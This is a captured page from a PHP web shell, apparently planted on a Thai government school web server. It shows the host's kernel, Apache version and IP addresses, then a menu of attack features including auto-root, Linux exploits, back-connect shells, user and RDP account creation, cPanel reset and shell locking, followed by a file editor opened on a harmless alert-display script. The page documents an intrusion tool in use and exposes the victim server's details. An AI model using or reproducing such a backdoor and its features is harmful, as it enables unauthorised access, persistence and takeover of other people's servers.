Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
alert /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
warning.php
1.44
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : warning.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); include("alert/alert.php"); $arr_length=count($system_alert_ar); if($arr_length>=1){ $M=1; if($_SESSION['user_os']=='mobile'){ echo "<br>"; echo "<table width='95%' border='1' style='border-collapse: collapse' align='center'>"; echo "<Tr bgcolor='#99ccff' align='center'><Td><b>ที่</b></Td><Td><b>ข้อความแจ้งเตือน</b></Td></Tr>"; } else{ echo "<br><br>"; echo "<table width='45%' border='1' style='border-collapse: collapse' align='center'>"; echo "<Tr bgcolor='#99ccff' align='center'><Td width='60'><b>ที่</b></Td><Td><b>ข้อความแจ้งเตือน</b></Td></Tr>"; } for($x=1;$x<=$arr_length;$x++){ if(($M%2) == 0) $color="#E5E5FF"; else $color="#FFFFFF"; echo "<Tr bgcolor='$color' align='center'><Td>$M</Td><Td align='left'>$system_alert_ar[$x]</Td></Tr>"; $M++; } echo "</table>"; } else{ echo "<div align='center'>"; if($_SESSION['user_os']=='mobile'){ echo "<font color='#006666' size='3'><strong>ไม่มีข้อความแจ้งเตือน</strong>"; } else{ echo "<br>"; echo "<font color='#006666' size='3'><strong>ไม่มีข้อความแจ้งเตือน</strong>"; } echo "</div>"; } ?>
Close